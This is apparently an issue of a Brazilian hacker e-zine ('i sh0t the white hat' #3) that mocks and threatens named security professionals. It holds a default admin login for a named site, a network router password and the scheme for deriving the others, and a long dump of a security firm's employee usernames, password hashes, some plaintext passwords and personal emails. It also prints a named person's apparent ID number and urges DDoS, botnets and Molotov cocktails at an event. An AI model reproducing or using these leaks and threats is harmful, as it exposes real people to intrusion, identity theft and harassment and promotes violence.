#!/bin/i/sh0t/the/white/hat
##############################################
#                                            #
#            PR0J3KT M4YH3M BR4Z1L           #
#               rm all whitehats             #
#           take back the underground        #
#                                            #
#        i sh0t the white hat eDiçãO 3       #
#					     #
#          ish0tthewhitehat@gmail.com        #
#                                            #
##############################################

<<< SiTeS dE DiSTRiBuiçÃ0 >>>

################################################
##					      ##
##   <*> ish0tthewhitehat.com (siTe of1cial)  ##
##                                            ##
##   mirrorz                                  ##
##   <*> packetstormsecurity.org/mag/istwh/   ##
##   <*> rnp.br/cais/istwh/                   ##
##   <*> dpf.gov.br/~pr0j3ktm4yh3m/istwh/     ##
##   <*> cert.br/docs/whitepapers/istwh       ##
##   <*> abin.gov.br/~pr0j3ktm4yh3m/istwh/    ##
##   <*> modulo.com.br/undergr0und/istwh/     ##
##   <*> pangeia.com.br/istwh/                ##
##   <*> aker.com.br/.owned/istwh             ##
##   <*> issabrasil.org/owned/istwh3.txt      ##
##					      ##
##					      ##
##   |*| ish0tthewhitehat@gmail.com |*|	      ##
##					      ##
################################################


i sh0t the white hat
but I didn't sh0t the script kiddie
Oooohhh
i sh0t the white hat
but I didn't sh0t the script kiddie
Oooohhh (Owned Marley)



<<< LaMerZicE do An0 - A "Nata" dos Profissionais de Segurança da Informação powered by Ernst & Young >>>

## http://www.ti-intelligence.com.br/admin ##
## login: admin				   ##
## senha: admin				   ##



			       __    __          
			  ____/ /___/ /___  _____
			 / __  / __  / __ \/ ___/
			/ /_/ / /_/ / /_/ (__  )
			\__,_/\__,_/\____/____/                         
	                                                          __       
	  _________ _____ ___  ____  __  ___________  ____ ______/ /___  __
	 / ___/ __ `/ __ `__ \/ __ \/ / / / ___/ __ \/ __ `/ ___/ __/ / / /
	/ /__/ /_/ / / / / / / /_/ / /_/ (__  ) /_/ / /_/ / /  / /_/ /_/ / 
	\___/\__,_/_/ /_/ /_/ .___/\__,_/____/ .___/\__,_/_/   \__/\__, /  
        	           /_/              /_/                   /____/   
	   ___   ____  ____  ____ 
	  |__ \ / __ \/ __ \/ __ \    H4CK CR4CK D3STR0Y M0TH3RFUCK3R
	  __/ // / / / / / / /_/ /
	 / __// /_/ / /_/ /\__, / 
	/____/\____/\____//____/ 


BOICOTEM A CAMPUSPARTY 2009!! QUE SE FODAM BLOGGERS E GAMERS CASEMODERS IDIOTAS
	BOTNETS + DDoS + COQUETEL MOLOTOV NAS BARRACAS DA CAMPUSPARTY2009






	              PARENTAL ADVISORY - EXPLICIT HUMILIATION
	
		    :::     :::     :::   :::   ::::::::   :::::::  
		  :+: :+:   :+:     :+: :+:+:  :+:    :+: :+:   :+: 
		 +:+   +:+  +:+     +:+   +:+  +:+        +:+  :+:+ 
		+#++:++#++: +#+     +:+   +#+  +#++:++#++ +#+ + +:+ 
		+#+     +#+  +#+   +#+    +#+         +#+ +#+#  +#+ 
		#+#     #+#   #+#+#+#     #+#  #+#    #+# #+#   #+# 
		###     ###     ###     ####### ########   #######

	 	                     PHEAR US


a0s pr0f1ss10n4is r3cÉm ch3GaD0s a c3nA póS h0l0c4ust0 wh1t3 h4t c0mo Leonardo Cavallari Militelli (v0cê
r3c0nh3ce esSes núM3r0s 28841206888?) E 0s n0v4t0S da Clavis e 0utr0s p3nsEm b3m eM c0nt1nu4r. v0cês esTão
p1s4nd0 eM t3rr3nO H0st1l e p0d3m sE m4chUc4r d3 VerD4dE. pReF3Re a pÍlUl4 azUl 0u A v3rMelH4? a Escolh4
é sUA. S3j4 h0m3m e ArQuE c0m 4s c0nSeQuênc14s......


VOLTA PAULO TETINHA VOLTA PAULO TETINHA VOLTA PAULO TETINHA VOLTA PAULO TETINHA VOLTA PAULO TETINHA
VOLTA PAULO TETINHA VOLTA PAULO TETINHA VOLTA PAULO TETINHA VOLTA PAULO TETINHA VOLTA PAULO TETINHA
				a cisspBR precisa de vc



+><++><++><++><++><++><++><++><++><++><++><++><+
------------------------------------------------
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEX I SH0T THE WHITE HAT #3.0
=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=

1; intro
2; aker security solutions 0WN3D fuck Rodrigo Fragola
3; lifestyle of the owneds and lamests: Augusto Paes de Barros
4; premiação do troféu seclamer - prêmio camargo neves, o oscar da segurança do brasil
5; ISSA Brasil 0WN3D
6; infos pessoais (souzadc, Sérgio Amadeu, Denny Roger, André Fucs, Adriano Cansian, Demi Getschko e ABIN)
7; invasao.com.br && forum-invasao.com.br 0wn3d
8; superlista de white hats para você fazer rm -rf
9; G4ry K4sp4r0v 0wnz hackerxadrez.com.br
10; w4nt3d s0urc3 k0d3z & stuFF
11; outr0

=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
------------------------------------------------
+><++><++><++><++><++><++><++><++><++><++><++><+




	   __      __  ___                 _____     _ 
	  /__\  /\ \ \/ _ \__      ___ __ |___ /  __| |
	 / \// /  \/ / /_)/\ \ /\ / / '_ \  |_ \ / _` |
	/ _  \/ /\  / ___/  \ V  V /| | | |___) | (_| |
	\/ \_/\_\ \/\/       \_/\_/ |_| |_|____/ \__,_|

############################################################
######## RNP - BackBone - Estado do Rio de Janeiro #########
############################################################

WARNING: Unauthorized access to this computer system is
prohibited. Violators are subject to criminal and civil
penalties.


User Access Verification

Password: rbb3o
bb3-rj> enable
Password:
bb3-rj#


s3nh4s bb3 = pr1m3iRa LeTr4 d0 ESt4d0 + bb3 + úLtim4 LeTr4 d0 ESt4d0
exemplo Amazonas (bb3.pop-am.rnp.br) = abb3s 

CAIS K1SS MY 4ZZ! CAIS K1SS MY 4ZZ! CAIS K1SS MY 4ZZ! CAIS K1SS MY 4ZZ!
R3sp0st4 4 iNciD3nt3 0 c4r4Lh0#!@@!! FUCK 1V0 P31X1NH0 DPF


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
EX7R4!: AUGUSTO PAES DE BARROS F0G3 D0 PR0J3KT M4YH3M 3 S3 MUD4 P4RA 0 C4N4DÁ
------

Fug1nd0 d4 pErsEguIçã0 a0s wh1t3 h4ts n0 Br4s1l, Augusto Quadro Paes de Barros
r3s0lv3u s3 Mud4r p4rA 0 Can4Dá c0m 4 FalS4 eXpeCtaT1v4 dE quE eSt4Rá s3gur0
c0ntr4 nÓs. F1c4m0s mUiT0 trIsT3s c0m 4 noTíc14 da "recolocação", c0Mo 0s C1SSPZ
g0st4m d3 f4l4r. Um Wh1t3 h4t 4 m3n0s p4Ra Z0aR (ainD4 p0r c1m4 d0 n4ip3 d0
Augustinho) É s3mPrE rU1m, m4s a0 MeSm0 T3mp0 é b0m p0RquE d1m1nUi n0sS0 tr4b4lh0.
Esp3r4m0s Qu3 v0Cê c0nt1nu3 4 C0ntr1bU1r n4 cisspBR c0m S3us c0M3nTáR10s iMb3c1s.

Entã0 v4i p4rA v0cÊ, Augustinho uM tr3ch0 d3 uM4 mÚs1c4 d3 su4 b4ndA pr3f3r1dA,
o Oasis. F3ch3 0s 0lh0s e Finj4 quE s0m0s Liam Gallagher


"So don't go away say what you say
But say that you'll stay
Forever and a day...in the time of my life
Cos I need more time yes I need more time
Just to make things right"


Qu3r1d0 3xp4tr14d0, a N0ss4 cÉluL4 c4n4DeNSe eS74Rá d3 0lh0.

Com amor,
i sh0t the white hat / pr0j3kt m4yh3m br4z1l


-----------------------------------------------------------------------------------------
1; intro
-----------------------------------------------------------------------------------------

C0mp4nhEir0s de lut4 e c4m4rAdaS d4s TrinCheiRas dO uNDerGr0und!

M4is um4 v3z 0s c4v4l3ir0S d0 4p0c4l1ps3 wh1t3 h4t esTã0 d3 v0lt4, d3ssA v3z m4is bRuT4is
e iMpi3D0Sos Do QuE nUnca.
NeSt4 ediÇã0 s3 enc0ntr4m vÁri0s r3sulT4d0s d0 tr4bAlh0 d4 c0muNiD4de. JuNT0s C0nsEgu1m0s
4lv3jAr c0m suCess0 DiVeRs0s p0rt4is, 0bt3r d4d0s p3ss0Ais d0s m4is f4m0s0s white hats br4s1l3ir0s 
e 0wn4r uM4 d4s m4i0ReS eMpr3SaS de SeGuR4nçA d0 Br4S1L. A un1ã0 f4z a f0rç4, c4m4R4d4s!!!!

N0v4m3ntE a p4r4d4 aQui é A s3gu1nt3: s3 v0cÊ f0i m3nc10n4d0, v0Cê f0i 0wn4d0. S3 v0cê nã0 f0i ag0ra
É melh0r s3 cu1d4r p4r4 nãO s3r n4 prÓx1m4 eD1çã0.

"keep PR0J3KT M4YH3M alive!" (gayh1tler)

    WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST
    WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST
    WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST
    WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST
    WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST | WHITE HAT HOLOCAUST


obs: Ex1g1m0s Paulo Tetinha d3 v0lt4 a cisspBR!!!11

-----------------------------------------------------------------------------------------
2; aker security solutions 0WN3D fuck Rodrigo Fragola
-----------------------------------------------------------------------------------------

 QUEREMOS QUE RODRIGO FRAGOLA PARE DE ANDAR DE AUDI EM BRASÍLIA E PEGUE METRÔ E BUSÃO CUM NÓIS 


p0d3m FiC4r trAnQuiL0s QuE 0s s3us s0uRc3 c0d3s esTãO gu4rDad0s n0s DiSc0s crIpToGr4f4doS
d0s nOSs0s sErv1d0Res 3m Taiw4n e sÓ v3nDeRem0S o cÓdig0 e 0UtrAs infoRm4çõEs d4 eMpr3sA m3DianTe a
uM p4Gam3nt0 d3 1 milhão de dólAr3s (o q c3rtaMent3 niNguÉm v4i p4Gar p0r esSa m3rd4 d3 pr0dut0)


iRíam0s m0strAr 0 mailSpooL d0 R0dr1G0 Fr4G0la m4s Só tInh4 sp4m e P0rnoGraFi4, n4dA RealMenT3 úTil :(((((

É H0ra d0 sh0w c0m3ÇaR!!!!!!!!!!!


<===dumpz===>

fragola 2bc6cb1d1cf58d81  rodrigo.fragola@aker.com.br 
denny   denny@sp.aker.com.br
agner 6cc958967c28cda6  agner.vidal@aker.com.br 
alberto 6d1e848a71259f0a ajarosi@ig.com.br alberto@sp.aker.com.br 
altevir 4ae82b8b22aa6625 altevir@yahoo.com altevir@sp.aker.com.br 
carol@aker.com.br 
anareboucas 02ad01162f06c47a ancl@bol.com.br; anareboucas_rj@hotmail.com anareboucas@rj.aker.com.br 
angelica   angelica@sp.aker.com.br 
braguin 0afd6265678ec34f  braguin@sp.aker.com.br 62c3817664442773   
carlos 7e64f71612fd25d9  carlos@sp.aker.com.br 
cmarques 0afd6265678ec34f  cmarques@aker.com.br 
edmundop 050b6f3f79ecc6e4  edmundo.braga@aker.com.br 
daniel.sundfeld 5078edfa2f4a035f danielsunfeld@gmail.com daniel.sundfeld@aker.com.br 
efiori@sp.aker.com.br 
abdalla 01e563c417823e8b  fabio.abdalla@aker.com.br 
fabiolp 0afd6265678ec34f  fabiolp@rj.aker.com.br 
fabio 138711a844119cbd  fabio.luna@aker.com.br 
fabricio 0afd6265678ec34f ffavarots@hotmail.com fabricio@aker.com.br 
fany@sp.aker.com.br
kiko@aker.com.br 
gmartins 0afd6265678ec34f z.linux@terra.com.br gmartins@rj.aker.com.br 
guilherme 0afd6265678ec34f  guilherme@aker.com.br 
grondina 0afd6265678ec34f  grondina@aker.com.br 
gustavotomás  gustavo.costa@brturbo.com gustavo@aker.com.br 
helio    
heloise 175020dc152648d8 loloze@zipmail.com.br heloise@aker.com.br 
ifarag 1002a19046620fca  ifarag@rj.aker.com.br 
ivana 77d55e39758dc29d ivanakavamoto@hotmail.com ivana.kavamoto@aker.com.br 
jederson 32b58b256731fe2b  jederson.chaves@aker.com.br 
jeimmerson   jeimerson@aker.com.br 
joao 0afd6265678ec34f malmegrin@bol.com.br joao@aker.com.br 
jorge 78dded3a37ba7ef0 senha: a5412g jorge.p.vasquez@gmail.com jorge.vasquez@aker.com.br 
joseluiz 0c800a3a7e734688  joseluiz@aker.com.br 
josemaria  netoviskis@ig.com.br neto@aker.com.br 
zaranza 2f6f4e360b8539e3 marceloz@agricultura.gov.br marcelo.zaranza@aker.com.br 
marcia 0afd6265678ec34f teixeira_m@hotmail.com marcia@sp.aker.com.br 
mdamiao 565491d704013245 mdvneves@ig.com.br marcos.damiao@aker.com.br 
nassif  nassif@ig.com.br nassif@aker.com.br 
jason 552c1e2504a8081f  mmaurer@aker.com.br 
sarres 758656e64d35646f  marcos.sarres@aker.com.br 
meiry 565491d704013245 senha: 123456 meiry_hellen@hotmail.com meiry.xavier@aker.com.br 
muriel 0afd6265678ec34f  muriel@sp.aker.com.br 
timm 78af356b29dad70f senha: 110502  odacyr.timm@aker.com.br 
psanchez 0afd6265678ec34f phackwer@hotmail.com psanchez@aker.com.br 
pat.pinheiro   patricia@aker.com.br 
renunes 3df64fe7300b9763  renunes@aker.com.br 
renata 4fc7f5a5125b07f5  renata@aker.com.br 
rene 565491d704013245 rene@doctorfix.com.br rene@aker.com.br 
roberta    
ormonde 62279c814fc68f1e  rodrigo.ormonde@aker.com.br 
rommeine    
sergio 0afd6265678ec34f  sergio@aker.com.br sergiom@agricultura.gov.br 
zillig 35e8cd075a100374  sergio@sp.aker.com.br 
simone 4d09d4ba65a43de2  simone@aker.com.br 
sueli 721b52ae5a514195  senha: sgarbi suelisgarbi@hotmail.com sueli@sp.aker.com.br 
tatiane 2e782c85379a326e tathhisouza@bol.com.br tatiane@sp.aker.com.br 
tatiane   tatiane@aker.com.br 
thiago 79048d8c42a9afa6  thiago@aker.com.br 
wanderson 56a3702221087ddd  wanderson@pr.aker.com.br 
natalia@sp.aker.com.br 
alexandre@sp.aker.com.br 
michael@sp.aker.com.br 
378574b10aefde58 sylvia_barros@hotmail.com  
graciele@pr.aker.com.br 
asousa 792cb55b47be14af andrelnsousa@hotmail.com andre.sousa@aker.com.br 
ricardo 290d10c3240a9f94 ricardo.jorba@gmail.com ricardo@aker.com.br 
leandroamin 5f6b5267023f4407 amin_santana@yahoo.com.br leandro@pr.aker.com.br 
root 573eaf330c68d382   
priscila   prescila@sp.aker.com.br 
andreabf 3deca0314582ce3e   
albcazer 7a4cf9892406b8a8 albcazer@hotmail.com alberto.cazer@aker.com.br 
paulafranca 549c26102e3f67d9 pauladany@terra.com.br paula@aker.com.br 
acy 3283f5117d3e61e1  acy@rj.aker.com.br 
marcelo 5948e3912504f009 marcelo@acmesecurity.org marcelo@aker.com.br 
soraya 446a12100c856ce9   
pedatella 79afa4a20d1a3778  rodrigo.pedatella@aker.com.br 
rogerio 53dae34c77372f1f ruhollahkomeine@yahoo.com.br rogerio@aker.com.br 
drebello 0afd6265678ec34f  drebello@rj.aker.com.br 
fernanda 0afd6265678ec34f defcampos@ig.com.br  
lucianasantos 193fbee130a9a2f5 lualg@terra.com.br luciana@aker.com.br 
eduardo 14ae0ecb38a01ad3 eterzella@hotmail.com eduardo@aker.com.br 
msr 0afd6265678ec34f  msr@sp.aker.com.br 
falmeida 112a5b5b540ba6ba lipealmeida@hotmail.com filipe@rj.aker.com.br 
leandrom 0afd6265678ec34f wazup@brnet.com.br leandro@aker.com.br 
theu-sp@bol.com.br  
lfogaca 0afd6265678ec34f  lfogaca@rj.aker.com.br 
marcuslima@marcuslima.eti.br marcuslima@rj.aker.com.br 
franco 1d15b2e218123131 francopjunior@hotmail.com franco@rj.aker.com.br 
celio    
adrianas 3283f5117d3e61e1   
lucas 41eba6124d4e4f0b  lucas.pereira@aker.com.br 
kennedy 565491d704013245 jkga@espuny.zzn.com jkennedy@pr.aker.com.br 
fabiana 0afd6265678ec34f fabianagandrade@zipmail.com.br fabiana@aker.com.br 
ramson 565491d704013245   
juliane   jviegas@rj.aker.com.br 
rafael 1adb0ff01dd9c62c  rafael@aker.com.br 
mariors 5f6b5267023f4407  mario@pr.aker.com.br 
juan    
tatiana@sp.aker.com.br 
suzana 52ab9b256e9c16a1  suzana.soares@aker.com.br 
mauricio 1479ca8d781dd1da  mauricio@sp.aker.com.br 
renatac 6abecc057aa46871  renata@sp.aker.com.br 
alcimara 3283f5117d3e61e1  alcimara@sp.aker.com.br 
carla 0afd6265678ec34f  carla@pr.aker.com.br 
ricardos 1407a86b6085d0f7  ricardo@sp.aker.com.br 
glaucinete 0afd6265678ec34f glaucinete@hotmail.com glaucinete@aker.com.br 
anarita 5a12c8d8558b1469 arosorio71@hotmail.com anarita@aker.com.br 
foliveira 388466896153c5a4 flavinha@hotmail.com foliveira@rj.aker.com.br 
silvana  sss06@pop.com.br silvana@pr.aker.com.br 
marina 7f6b9f9c5fb43da6 marinaleonel@hotmail.com marina.leonel@aker.com.br 
marcilio 32101213420ea4cc  marcilio@aker.com.br 
carlospeliceli 565491d704013245 carlospeliceli@uol.com.br carlos.peliceli@aker.com.br 
gfleury 0afd6265678ec34f  gfleury@aker.com.br 
jeane 565491d704013245  jeane@pr.aker.com.br 
silvana 4aa0aaf97a4da318  silvana@pr.aker.com.br 
lucio 0afd6265678ec34f  lucio@aker.com.br 
nancy   nancy@pandasoftware.com.br 
claudio 0b482f0c207d95bb  claudio@aker.com.br 
jacira    
rcortez 0afd6265678ec34f  rcortez@aker.com.br 
kelly 1b864bb10127eba2  kelly.correia@aker.com.br 
santiago 0de66db557587779 san_tibr@yahoo.com.br santiago.santos@aker.com.br 
flaviojc 2f967aed7125c39a flavio@chiodi.com.br flavio.chiodi@aker.com.br 
bruno_rj 565491d704013245  bruno@rj.aker.com.br 
adrianod 3283f5117d3e61e1 adrianoceub@cidadeinternet.com.br  
renatapi@pandasoftware.com.br 
elpidio 0c5425837a897c66  elpidio@sp.aker.com.br 
djlibriana@hotmail.com vivian@pandasoftware.com.br 
andrethiago 0cca7dbb3461b2ae andrecompbr@yahoo.com.br andre.thiago@aker.com.br 
glauber  scorsatto@brturbo.com glauber@aker.com.br 
clesio 29acf91c42309aca clesiosm@hotmail.com clesio.moura@aker.com.br 
dante  dantefilho@bol.com.br dante@aker.com.br 
KARL  karlstiller@yahoo.com.au karl@aker.com.br 
tatianem 08e2268a32b96630  tatianem@aker.com.br 
leolucas.ribeiro@zipmail.com.br leonardo@aker.com.br 
eduhenrique  carvalhoeduardo@yahoo.com.br carvalho@aker.com.br 
idiane 65febd2c226c9b96 idianesilva@yahoo.com.br idiane@aker.com.br 
marcelocruz  marcelo_xavier@yahoo.com  
azanella 565491d704013245 zatraz@bol.com.br adhemerval.azanella@aker.com.br 
msilva 21a1d52844483d7e  msilva@sp.aker.com.br 
helena 1367fb8c2ad0374f  mariahelena.mota@aker.com.br 
rodrigo 56c43c2e2e6d4b32  rodrigo@sp.aker.com.br 
andre 565491d704013245  senha: 123456 andresiqueira@brturbo.com andre.siqueira@aker.com.br 
ivirtua 0c95234760ae5a28   
monica 46b6f88915543303  monica.cardoso@aker.com.br 
mchaves 55f0312a3c9fa8b3  marcelo.chaves@aker.com.br 
regis 3591696a55801949  regis.montes@aker.com.br 
leonardo.neves 19542b5f2f69cf0a  leonardo@aker.com.br 
rosangela 565491d704013245 ro_dutra_akr@hotmail.com rosangela.dutra@aker.com.br 
fernandogomes 4058b5992c36d85d  fernandogomes@pr.aker.com.br 
fern.luiz  fernandols_gomes@hotmail.com fernandogomes@pr.aker.com.br 
flavio 6826118a23f8ee67  flavio@sp.aker.com.br 
erick 565491d704013245 erick@brockes.com erick@aker.com.br 
eliezer 41f76705428a4430 eliezer.silva@e-technology.com.br eliezer.silva@aker.com.br 
lwinter 64bcd82a7c323329 leowinter@pop.com.br leonardo.winter@aker.com.br 
landrade 19e608477f3c71e2  leonardo.andrade@aker.com.br 
cgallo 565490c204013130 cgn_gallo@uol.com.br carlos.gallo@aker.com.br 
leniele 5a2215585f18261a leniele.teixeira@gmail.com leniele.teixeira@aker.com.br 
ronny   ronny.santos@aker.com.br 
ronaldo 565491d704013245  ronaldo.jose@aker.com.br 
junior   idelfonso.junior@aker.com.br 
cynthia 4b354ffa04037067 cycydc@yahoo.com.br cynthia@sp.aker.com.br 
luizalmeida 176c2ad2410b15bf luizerico@hotmail.com luizerico@aker.com.br 
adriana.menezes 251c4f481ba32ca6 drikasm@ig.com.br adriana.menezes@aker.com.br 
ftrigueiro 1a9153207edd8e4b  felipe.trigueiro@aker.com.br 
gustavo 3a9fa07f709c801d   
vbortone 330f52c231ff5206  vbortone@aker.com.br 
vmferreira 76f1045a246f9cb0 vmferreira@superig.com.br vmferreira@aker.com.br 
tiagocap   tiago@pandasoftware.com.br 
hongma 73346db141a04c08   
alexandre 4448dd9a39ab97e1  alexandre@rj.aker.com.br 
edgard 565491d704013245 emvt@globo.com edgard@rj.aker.com.br 
regina 550805f858acd448  regina@sp.aker.com.br 
eduardo@bbtur.com.br  
geter  getersantos@hotmail.com geter.sousa@aker.com.br 
maria 204f07763cd01b81 maria_leonel2003@yahoo.com.br maria@aker.com.br 
gilbert 7c6709d151829b4e  gilbert.soares@aker.com.br 
aferreira 4ff63c994b79bb73 andrelpf@solar.com.br andre.ferreira@aker.com.br 
taboada 573eaf330c68d382  bruno.taboada@aker.com.br 
tais_rosa@hotmail.com tais@aker.com.br 
nicolai 6ecbb3137901ad4a nicolai.aker@gmail.com nicolai.mirsky@aker.com.br 
dig.fer  diegodraft@hotmail.com  
alfeno  alfeno@gmail.com  
dirceu 0668f5856505279c dirceu.jr@gmail.com dirceu.junior@aker.com.br 
rodrigues.rjo@ig.com.br jairo.oliveira@aker.com.br 
Guilherme 5f0c055d70ce120b guilherme52@yahoo.com.br guilherme.fontes@aker.com.br 
flavio 17c44fd6204a03a6 flavio_rj@hotmail.com flavio.lima@aker.com.br 
diogoodan  diogo_hideo@yahoo.com.br diogo.odan@aker.com.br 
saldanha 1ea0bed002c94801  hugo.saldanha@aker.com.br 
alexandre 565491d704013245 abissoni@gmail.com/abissoni@hotmail.com alexandre.fernandes@aker.com.br 
aedilson 01fe86303fe8889b  edilson.moura@aker.com.br 
fabioadriano   fabio@sp.aker.com.br 
francyelly 565491d704013245  francyelly@pr.aker.com.br 
pvespucio 191b987b3fb8e3af paulovespucio@hotmail.com.br paulo.vespucio@aker.com.br 
lsoares 4c4387c57e34bf91  luis.soares@aker.com.br 
eder 6cba62475ee36f83  eder.monteiro@aker.com.br 
denis 171ebcf415767671  denis@aker.com.br 
teste 565491d704013245  teste@aker.com.br 
daniel 6c592d1241cab0fa  daniel.mezzato@aker.com.br 
ri.roz    
dan. scan    
victor 72e888d327dd84b6 victormirsky@yahoo.com.br victor@aker.com.br 
cleber 05b244a466f3a420  cleber.marques@aker.com.br 
kiko 56237687716ffc40 kikobr@brturbo.com cduarte@aker.com.br 
rosem  opsrosy@gmail.com/ops_rosy@hotmail.com  
roseane 44020a294044989c roseane.machado@gmail.com roseane.machado@aker.com.br 
le.az   leandro.azevedo@aker.com.br 
talmeida 565491d704013245  thiago.almeida@aker.com.br 
gilvan.oliveira@aker.com.br 
raineri 25096e64001bd6fa  leandro.raineri@aker.com.br 
humb. sil   humberto.s.maia@gmail.com 
allan 3b06f6f721a62575 allanbf@yahoo.com.br allan.fonseca@aker.com.br 
francisco 1e48becf69c0ad1c  francisco.carvalho@aker.com.br 
izabel 565491d704013245   
serge 565491d704013245  serge.kamimoto@aker.com.br 
weslei.marcos  detachweslei@bol.com.br weslei.marcos@aker.com.br 
oldairjb 33289360082cd5f9  oldair.barbosa@aker.com.br 
lhenrique 4b6f4b0960f327b6  luis.pinton@aker.com.br 
mwsilva 30d94da91c0b8227 m.cassin@ig.com.br marcelo.cassini@aker.com.br 
vanm  peixotovanessa@hotmail.com  
mhelmer 1a4cca095a8f9d20 mahelmer@terra.com.br mario.helmer@aker.com.br 
felbs   felipe.scarel@aker.com.br 
elisabete 591ca13113b82104 betejlima@ig.com.br elisabete.lima@aker.com.br 
eduardo 7b0d91101ab28863 edu.santos@gmail.com eduardo.santos@aker.com.br 
rubens 64a188566e20ada5 vazrubens@hotmail.com rubens.ferreira@aker.com.br 
heloisa 038827125f5cde8f heloisamata@yahoo.com.br heloisa.mata@aker.com.br 
dilvan 012c768476018691 senha: dilvan dilvan.lima@aker.com.br 
ana 267a473331a98eda anacarolinaalarcao@hotmail.com ana.carolina@aker.com.br 
rsouza 5c64537b2b09951d rosanas28@hotmail.com rosana.souza@aker.com.br 
eliane.barbosa 7d163e4a2117551b  eliane.barbosa@aker.com.br 
francisca 037e03be3f66c47a fran.sales@hotmail.com/ciskiuda@yahoo.com.br francisca.sales@aker.com.br 
jairo 3e80995133f29883  jairo@aker.com.br 
vinf  vinicius.karvalho@gmail.com  
bruno.roth 489561d755ad1374 brunoroth@gmail.com.br bruno.roth@aker.com.br 
leia 61465731403cc875 leiacampos@bol.com.br leia.campos@aker.com.br 
monica 47669bc44dd57f17 monicalsimoes@gmail.com monica.silva@aker.com.br 
sergio.saraiva  sergions10@hotmail.com sergio.saraiva@aker.com.br 
joao  joaogustavo@yahoo.com.br gustavo.carvalho@aker.com.br 
adm  adimarjunior@bol.com.br  
francivaldo 06f97fdd0e5a6199 francis.cavalcante@gmail.com franci.barbosa@aker.com.br 
paula.moura 565491d704013245 paulamoura@brturbo.com.br paula.moura@aker.com.br 
daniel.sousa 4684c10447ca4625 danielsousat@gmail.com  
thiago.passos 565491d704013245   
brunot  bruno_919@terra.com.br  
jed  rafael.sisi@gmail.com  
tiag *6BB4837EB743291   
wel *6BB4837EB743291   
wer *6BB4837EB743291 werbert@pop.com.br  
andre.thiago *6BB4837EB743291  andre.thiago@aker.com.br 
oto  ocastellar@correioweb.com.br  
rodrigo.botelho 20fbfe4d079613df vronks@gmail.com  
jgastal 303e7a047bd67acb jokerwww@gmail.com jonas.gastal@aker.com.br 
denis.costa  deniscostadsc@gmail.com denis.costa@aker.com.br 
danquintao@gmail.com  
genilda    
daniel.quintao 6ed0acec4be9a5d8 danquintao@gmail.com daniel.quintao@aker.com.br 
hammurabi.mendes 680b920b5650ff43 hammurabi.mendes@gmail.com hammurabi.mendes@aker.com.br 
anacris 1593491f16a48574  acris.brasil@hotmail.com 
glaucia 6b4c1ada25018c5d glauollyver@gmail.com  
lsiqueira 6795c4bb01ba4f48 luizsiqueira98@hotmail.com  
paula.campos  paulacerbino@bol.com.br  
cleber2 565491d704013245   
erivan 565491d704013245  carlos.erivan@aker.com.br 
guilherme.hott 7fcf40a65ba2252d guilhermehott@gmail.com guilherme.hott@aker.com.br 
Guilherme 5f0c055d70ce120b   
albenira.ramos 58fe33a26cb3c371  albenira.ramos@aker.com.br 
thiago.cezanne  cezannesilva@hotmail.com thiago.cezanne@aker.com.br 
alex.morais    
renato    
eduardo.rodrigue  rb.eduardo@gmail.com  
rodrigo    
leandro.lacerda 33ccfae5384f54a0 lacerda.oliveira@gmail.com leandro.lacerda@aker.com.br 
christiano.carva 35452ec03eb5ee01 chrisguicar@gmail.com christiano.carva@aker.com.br 
marcelo.ronzani 6966c05c4f97a4ca marcelo.regal@gmail.com marcelo.ronzani@aker.com.br 
rodrigo.freitas 565491d704013245 rodrigo.aranha@gmail.com rodrigo.aranha@aker.com.br 
pedro.alves  rodrigo.neiva@gmail.com  
leonardo.torres 350cfe2d3b3ac24c leonardo.torres@parceriaweb.com.br leonardo.torres@aker.com.br 
rafael.bertacchi 565491d704013245 rafaelbertacchi@yahoo.com.br rafael.bertacchi@aker.com.br 
danielle.amarilh 4baebef4520f5a48 danielle.jus@hotmail.com danielle.sousa@aker.com.br 
adriano.gurgel 158303fd2883d970   
henry 6f749e0b5f766e58  henry.souza@aker.com.br 
fabiob 62279c814fc68f1e  fabio.butler@aker.com.br 
ciromancilha 591e66c60e2aed21 cirocm@gmail.com ciro.mancilha@aker.com.br 
oseias 773359240eb9a1d9   
tecnico 123   
raquel.martins 7663888f18e7364f raquelcheirinho@hotmail.com raquel.martins@aker.com.br 
kelly.souza  kellypsouza@hotmail.com  
francisco.dias 764ce90d5a6c7116 franj63@gmail.com francisco.dias@aker.com.br 
raisa.lopes 31631c97501a9be9 raisa.lopes@gmail.com raisa.lopes@aker.com.br 
verônica.simões 5ba5864561ba5a32 veurybarros@yahoo.com.br veronica.simoes@aker.com.br 
wolmer.godoi 6d1b631a38b1ee47 wolmer@gmail.com wolmer.godoi@aker.com.br 
helvio.junior 4fac4650116d04d6 helvio_junior@hotmail.com helvio.junior@aker.com.br 
alessandro.marti 58b7d9341be6bea9 martinez.df@gmail.com  
claudio.silva 526eb3f208b68e64 claudiol1406@yahoo.com.br claudio.lemos@aker.com.br 
artur.trajano 77f3772f459fc5a0 artur.trajano@gmail.com artur.trajano@aker.com.br 
andrea.surerus 5cd946dc428c5871 andrea.surerus@gmail.com andrea.surerus@aker.com.br 
luis.augusto    
janayna.dias 0b4c55ab10f644ab janaynad@gmail.com janayna.dias@aker.com.br 
nathalia.santos 134cdeda00d2e9c4 natyfallen@hotmail.com nathalia.santos@aker.com.br 
emanuel.sampaio 41a755f15525346c contato@emanuelsampaio.com  
cleysson.lima 75bfe1537b5cf6fa blade.sql@gmail.com  
luiz.carvalho 2fb421c90be4018a luizcarlos@carneirocarvalho.com.br  
